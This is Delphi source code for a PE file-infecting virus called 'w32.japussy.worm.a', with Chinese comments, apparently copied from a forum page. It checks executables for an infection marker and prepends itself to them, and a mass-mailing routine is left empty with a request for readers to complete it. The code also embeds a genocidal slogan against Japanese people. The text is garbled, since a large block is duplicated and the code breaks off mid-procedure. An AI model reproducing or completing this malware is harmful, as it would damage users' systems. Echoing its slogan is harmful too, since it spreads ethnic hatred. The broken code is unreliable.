program japussy;
uses
windows, sysutils, classes, graphics, shellapi{, registry};
const
headersize = 82432; //病毒体的大小
iconoffset = $12eb8; //pe文件主图标的偏移量
//在我的delphi5 sp1上面编译得到的大小,其它版本的delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
headersize = 38912; //upx压缩过病毒体的大小
iconoffset = $92bc; //upx压缩过pe文件主图标的偏移量
//upx 1.24w 用法: upx -9 --8086 japussy.exe
}
iconsize = $2e8; //pe文件主图标的大小--744字节
icontail = iconoffset + iconsize; //pe文件主图标的尾部
id = $44444444; //感染标记
//垃圾码,以备写入
catchword = 'if a race need to be killed out, it must be yamato. ' +
'if a country need to be destroyed, it must be japan! ' +
'*** w32.japussy.worm.a ***';
{$r *.res}
function registerserviceprocess(dwprocessid, dwtype: integer): integer;
stdcall; external 'kernel32.dll'; //函数声明
var
tmpfile: string;
si: startupinfo;
pi: process_information;
isjap: boolean = false; //日文操作系统标记
{ 判断是否为win9x }
function iswin9x: boolean;
var
ver: tosversioninfo;
begin
result := false;
ver.dwosversioninfosize := sizeof(tosversioninfo);
if not getversionex(ver) then
exit;
if (ver.dwplatformid = ver_platform_win32_windows) then //win9x
result := true;
end;
{ 在流之间复制 }
procedure copystream(src: tstream; sstartpos: integer; dst: tstream;
dstartpos: integer; count: integer);
var
scurpos, dcurpos: integer;
begin
scurpos := src.position;
dcurpos := dst.position;
src.seek(sstartpos, 0);
dst.seek(dstartpos, 0);
dst.copyfrom(src, count);
src.seek(scurpos, 0);
dst.seek(dcurpos, 0);
end;
{ 将宿主文件从已感染的pe文件中分离出来,以备使用 }
procedure extractfile(filename: string);
var
sstream, dstream: tfilestream;
begin
try
sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
try
dstream := tfilestream.create(filename, fmcreate);
try
sstream.seek(headersize, 0); //跳过头部的病毒部分
dstream.copyfrom(sstream, sstream.size - headersize);
finally
dstream.free;
end;
finally
sstream.free;
end;
except
end;
end;
{ 填充startupinfo结构 }
procedure fillstartupinfo(var si: startupinfo; state: word);
begin
si.cb := sizeof(si);
si.lpreserved := nil;
si.lpdesktop := nil;
si.lptitle := nil;
si.dwflags := startf_useshowwindow;
si.wshowwindow := state;
si.cbreserved2 := 0;
si.lpreserved2 := nil;
end;
{ 发带毒邮件 }
procedure sendmail;
begin
//哪位仁兄愿意完成之?
end;
{ 感染pe文件 }
procedure infectonefile(filename: string);
var
hdrstream, srcstream: tfilestream;
icostream, dststream: tmemorystream;
iid: longint;
aicon: ticon;
infected, ispe: boolean;
i: integer;
buf: array[0..1] of char;
begin
try //出错则文件正在被使用,退出
if comparetext(filename, 'japussy.exe') = 0 then //是自己则不感染
exit;
infected := false;
ispe := false;
srcstream := tfilestream.create(filename, fmopenread);
try
for i := 0 to $108 do //检查pe文件头
begin
srcstream.seek(i, sofrombeginning);
srcstream.read(buf, 2);
if (buf[0] = #80) and (buf[1] = #69) then //pe标记
begin
ispe := true; //是pe文件
break;
end;
end;
srcstream.seek(-4, sofromend); //检查感染标记
srcstream.read(iid, 4);
if (iid = id) or (srcstream.size < 10240) then //太小的文件不感染
infected := true;
finally
srcstream.free;
end;
if infected or (not ispe) then //如果感染过了或不是pe文件则退出
exit;
uses
windows, sysutils, classes, graphics, shellapi{, registry};
const
headersize = 82432; //病毒体的大小
iconoffset = $12eb8; //pe文件主图标的偏移量
//在我的delphi5 sp1上面编译得到的大小,其它版本的delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
headersize = 38912; //upx压缩过病毒体的大小
iconoffset = $92bc; //upx压缩过pe文件主图标的偏移量
//upx 1.24w 用法: upx -9 --8086 japussy.exe
}
iconsize = $2e8; //pe文件主图标的大小--744字节
icontail = iconoffset + iconsize; //pe文件主图标的尾部
id = $44444444; //感染标记
//垃圾码,以备写入
catchword = 'if a race need to be killed out, it must be yamato. ' +
'if a country need to be destroyed, it must be japan! ' +
'*** w32.japussy.worm.a ***';
{$r *.res}
function registerserviceprocess(dwprocessid, dwtype: integer): integer;
stdcall; external 'kernel32.dll'; //函数声明
var
tmpfile: string;
si: startupinfo;
pi: process_information;
isjap: boolean = false; //日文操作系统标记
{ 判断是否为win9x }
function iswin9x: boolean;
var
ver: tosversioninfo;
begin
result := false;
ver.dwosversioninfosize := sizeof(tosversioninfo);
if not getversionex(ver) then
exit;
if (ver.dwplatformid = ver_platform_win32_windows) then //win9x
result := true;
end;
{ 在流之间复制 }
procedure copystream(src: tstream; sstartpos: integer; dst: tstream;
dstartpos: integer; count: integer);
var
scurpos, dcurpos: integer;
begin
scurpos := src.position;
dcurpos := dst.position;
src.seek(sstartpos, 0);
dst.seek(dstartpos, 0);
dst.copyfrom(src, count);
src.seek(scurpos, 0);
dst.seek(dcurpos, 0);
end;
{ 将宿主文件从已感染的pe文件中分离出来,以备使用 }
procedure extractfile(filename: string);
var
sstream, dstream: tfilestream;
begin
try
sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
try
dstream := tfilestream.create(filename, fmcreate);
try
sstream.seek(headersize, 0); //跳过头部的病毒部分
dstream.copyfrom(sstream, sstream.size - headersize);
finally
dstream.free;
end;
finally
sstream.free;
end;
except
end;
end;
{ 填充startupinfo结构 }
procedure fillstartupinfo(var si: startupinfo; state: word);
begin
si.cb := sizeof(si);
si.lpreserved := nil;
si.lpdesktop := nil;
si.lptitle := nil;
si.dwflags := startf_useshowwindow;
si.wshowwindow := state;
si.cbreserved2 := 0;
si.lpreserved2 := nil;
end;
{ 发带毒邮件 }
procedure sendmail;
begin
//哪位仁兄愿意完成之?
end;
{ 感染pe文件 }
procedure infectonefile(filename: string);
var
hdrstream, srcstream: tfilestream;
icostream, dststream: tmemorystream;
iid: longint;
aicon: ticon;
infected, ispe: boolean;
i: integer;
buf: array[0..1] of char;
begin
try //出错则文件正在被使用,退出
if comparetext(filename, 'japussy.exe') = 0 then //是自己则不感染
exit;
infected := false;
ispe := false;
srcstream := tfilestream.create(filename, fmopenread);
try
for i := 0 to $108 do //检查pe文件头
begin
srcstream.seek(i, sofrombeginning);
srcstream.read(buf, 2);
if (buf[0] = #80) and (buf[1] = #69) then //pe标记
begin
ispe := true; //是pe文件
break;
end;
end;
srcstream.seek(-4, sofromend); //检查感染标记
srcstream.read(iid, 4);
if (iid = id) or (srcstream.size < 10240) then //太小的文件不感染
infected := true;
finally
srcstream.free;
end;
if infected or (not ispe) then //如果感染过了或不是pe文件则退出
exit;
扫一扫
625
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
